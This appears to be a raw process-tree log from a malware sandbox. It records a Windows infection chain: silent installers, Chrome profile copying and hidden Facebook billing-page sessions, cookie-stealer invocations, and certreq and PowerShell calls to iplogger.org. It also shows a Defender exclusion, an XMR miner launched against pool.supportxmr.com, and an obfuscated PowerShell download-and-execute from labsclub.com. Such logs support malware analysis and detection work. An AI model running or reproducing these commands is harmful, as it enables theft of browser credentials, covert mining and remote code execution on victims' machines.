C:\Users\Admin\AppData\Local\Temp\u4twwb0v5aa\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\u4twwb0v5aa\askinstall24.exe"21⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe22⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe23⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff7d126e00,0x7fff7d126e10,0x7fff7d126e2023⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,8856194880065896185,14091266374429307754,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1684 /prefetch:823⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gpnxbau2yhy\app.exe"C:\Users\Admin\AppData\Local\Temp\gpnxbau2yhy\app.exe" /8-2321⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\Delta.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-C0DJT.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-C0DJT.tmp\Delta.tmp" /SL5="$A02B2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\Delta.exe" /Verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GTUTB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GTUTB.tmp\Setup.exe" /VERYSILENT12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-GTUTB.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f14⤵
- Kills process with taskkill
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\zznote.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PK48V.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-PK48V.tmp\zznote.tmp" /SL5="$607B0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\zznote.exe" /Verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-P1T12.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-P1T12.tmp\jg4_4jaa.exe" /silent12⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\hjjgaa.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tciyqsvddsf\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\tciyqsvddsf\askinstall24.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y7⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/7⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xfc,0x7fff7d126e00,0x7fff7d126e10,0x7fff7d126e208⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,8271947517716593420,9606451750761960326,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1668 /prefetch:88⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yzovdjbss5m\safebits.exe"C:\Users\Admin\AppData\Local\Temp\yzovdjbss5m\safebits.exe" /S /pubid=1 /subid=4516⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3exndxzozwi\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\3exndxzozwi\chashepro3.exe" /VERYSILENT6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-905E2.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-905E2.tmp\chashepro3.tmp" /SL5="$602F0,2015144,58368,C:\Users\Admin\AppData\Local\Temp\3exndxzozwi\chashepro3.exe" /VERYSILENT7⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\0ot14dy1qj4\p1jw504tfuh.exe"C:\Users\Admin\AppData\Local\Temp\0ot14dy1qj4\p1jw504tfuh.exe" /ustwo INSTALL6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6567⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6687⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 7727⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 8087⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 8927⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 9327⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 10887⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\xf0v3tqwc2v\vict.exe"C:\Users\Admin\AppData\Local\Temp\xf0v3tqwc2v\vict.exe" /VERYSILENT /id=5356⤵
-
C:\Users\Admin\AppData\Local\Temp\is-A71JV.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-A71JV.tmp\vict.tmp" /SL5="$30602,870426,780800,C:\Users\Admin\AppData\Local\Temp\xf0v3tqwc2v\vict.exe" /VERYSILENT /id=5357⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U360J.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-U360J.tmp\wimapi.exe" 5358⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\klehdmb5tnk\app.exe"C:\Users\Admin\AppData\Local\Temp\klehdmb5tnk\app.exe" /8-236⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Small-Glitter"7⤵
-
-
C:\Program Files (x86)\Small-Glitter\7za.exe"C:\Program Files (x86)\Small-Glitter\7za.exe" e -p154.61.71.51 winamp-plugins.7z7⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Small-Glitter\app.exe" -map "C:\Program Files (x86)\Small-Glitter\WinmonProcessMonitor.sys""7⤵
-
C:\Program Files (x86)\Small-Glitter\app.exe"C:\Program Files (x86)\Small-Glitter\app.exe" -map "C:\Program Files (x86)\Small-Glitter\WinmonProcessMonitor.sys"8⤵
-
-
-
C:\Program Files (x86)\Small-Glitter\7za.exe"C:\Program Files (x86)\Small-Glitter\7za.exe" e -p154.61.71.51 winamp.7z7⤵
-
-
C:\Program Files (x86)\Small-Glitter\app.exe"C:\Program Files (x86)\Small-Glitter\app.exe" /8-237⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"2⤵
- Executes dropped EXE
-
C:\ProgramData\7164603.78"C:\ProgramData\7164603.78"3⤵
- Executes dropped EXE
-
-
C:\ProgramData\4124017.45"C:\ProgramData\4124017.45"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"4⤵
- Executes dropped EXE
-
-
-
C:\ProgramData\1024029.11"C:\ProgramData\1024029.11"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 14⤵
-
-
-
C:\ProgramData\6477954.71"C:\ProgramData\6477954.71"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3C6031AD6B30C6B1CBFD2ECBAF08A64C C2⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"1⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"1⤵
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"1⤵
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"1⤵
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NB48A.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-NB48A.tmp\wimapi.exe" 5351⤵
-
C:\Users\Admin\AppData\Local\Temp\fRFj3IKV0.exe"C:\Users\Admin\AppData\Local\Temp\fRFj3IKV0.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im fRFj3IKV0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\fRFj3IKV0.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im fRFj3IKV0.exe /f4⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo grYNxrw1⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970391⤵
-
C:\Users\Admin\AppData\Local\Temp\is-91ECC.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-91ECC.tmp\{app}\chrome_proxy.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PJ0JQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PJ0JQ.tmp\Setup.exe" /Verysilent1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-78J1E.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-78J1E.tmp\Setup.tmp" /SL5="$30240,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-PJ0JQ.tmp\Setup.exe" /Verysilent2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\ProPlugin.exe" /Verysilent3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G2MNH.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-G2MNH.tmp\ProPlugin.tmp" /SL5="$10490,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\ProPlugin.exe" /Verysilent4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-16G3U.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-16G3U.tmp\Setup.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"6⤵
-
C:\Windows\regedit.exeregedit /s chrome.reg7⤵
- Runs .reg file with regedit
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe7⤵
- Kills process with taskkill
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat7⤵
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"9⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7fff6cdd6e00,0x7fff6cdd6e10,0x7fff6cdd6e2011⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1652 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:211⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:111⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3976 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4160 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4244 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5216 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3508 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings11⤵
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff6ec167740,0x7ff6ec167750,0x7ff6ec16776012⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3844 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3940 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4324 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5064 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4776 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4712 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3908 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3832 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1660 /prefetch:811⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:811⤵
-
-
